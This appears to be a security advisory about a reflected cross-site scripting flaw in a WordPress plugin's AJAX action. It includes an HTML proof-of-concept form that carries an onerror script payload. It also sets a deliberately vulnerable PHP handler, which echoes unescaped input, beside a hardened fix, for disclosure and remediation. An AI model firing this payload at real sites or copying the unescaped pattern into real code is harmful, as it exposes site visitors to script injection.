The plugin does not sanitise or escape the error_message parameter before echoing it back in the response of the jltma_restrict_content AJAX action. The action is reachable through admin-ajax.php by both unauthenticated and authenticated users, so the value is reflected into a page under the site's origin, leading to a Reflected Cross-Site Scripting issue. Because the parameter is sent by POST, exploitation requires a victim to be induced to submit the request (for example via an auto-submitting form on an attacker-controlled page); the injected markup is executed only if the response is rendered as HTML.
<html>
  <!-- Proof of concept: submitting this form reflects the error_message value unescaped -->
  <form action="https://example.com/wp-admin/admin-ajax.php?action=jltma_restrict_content" method="POST">
    <input type="text" value="ma_el_rc_answer=x" name="fields">
    <input type="text" value="math_captcha" name="restrict_type">
    <input type="text" value="<img src onerror=alert(`XSS`)>" name="error_message">
    <input type="submit" value="Send">
  </form>
</html>
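To make the root cause concrete, the following is an added illustration of the vulnerable output pattern next to a hardened version; it is not the plugin's own code, and the function names, the nonce action name and the 'message' markup are assumptions chosen to mirror the parameters used in the proof of concept above. In WordPress, an admin-ajax action is reachable by unauthenticated users exactly when it is hooked on wp_ajax_nopriv_ in addition to wp_ajax_.

```php
<?php
// Added example, not code from the affected plugin. Handler names, the
// nonce action ('jltma_rc_nonce') and the output markup are assumptions.

// Vulnerable pattern: user-controlled text is concatenated into HTML and
// echoed verbatim, so <img src onerror=...> in error_message is executed
// by the browser that renders the response.
function jltma_restrict_content_vulnerable() {
    $error_message = isset( $_POST['error_message'] ) ? wp_unslash( $_POST['error_message'] ) : '';
    // ... captcha answer check omitted for brevity ...
    echo '<div class="jltma-rc-error">' . $error_message . '</div>';
    wp_die();
}

// Hardened pattern: verify a nonce so the request cannot be forged from a
// third-party page, sanitise on input, and escape on output so any markup
// in error_message is rendered as literal text.
function jltma_restrict_content_hardened() {
    check_ajax_referer( 'jltma_rc_nonce', 'nonce' ); // assumed nonce action/field names
    $error_message = isset( $_POST['error_message'] )
        ? sanitize_text_field( wp_unslash( $_POST['error_message'] ) )
        : '';
    // ... captcha answer check omitted for brevity ...
    echo '<div class="jltma-rc-error">' . esc_html( $error_message ) . '</div>';
    wp_die();
}

// Hooking on both wp_ajax_ and wp_ajax_nopriv_ is what exposes the action to
// unauthenticated visitors as well as logged-in users.
add_action( 'wp_ajax_jltma_restrict_content', 'jltma_restrict_content_hardened' );
add_action( 'wp_ajax_nopriv_jltma_restrict_content', 'jltma_restrict_content_hardened' );
```

When checking a fix, confirm both halves: the reflected value must pass through esc_html() (or an equivalent context-appropriate escaper such as wp_kses()) at the point of output, and the request must be bound to a nonce; sanitisation on input alone does not stop a payload such as the one above from being reflected as markup.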
Krzysztof Zając
Yes
2022-02-21
2022-04-13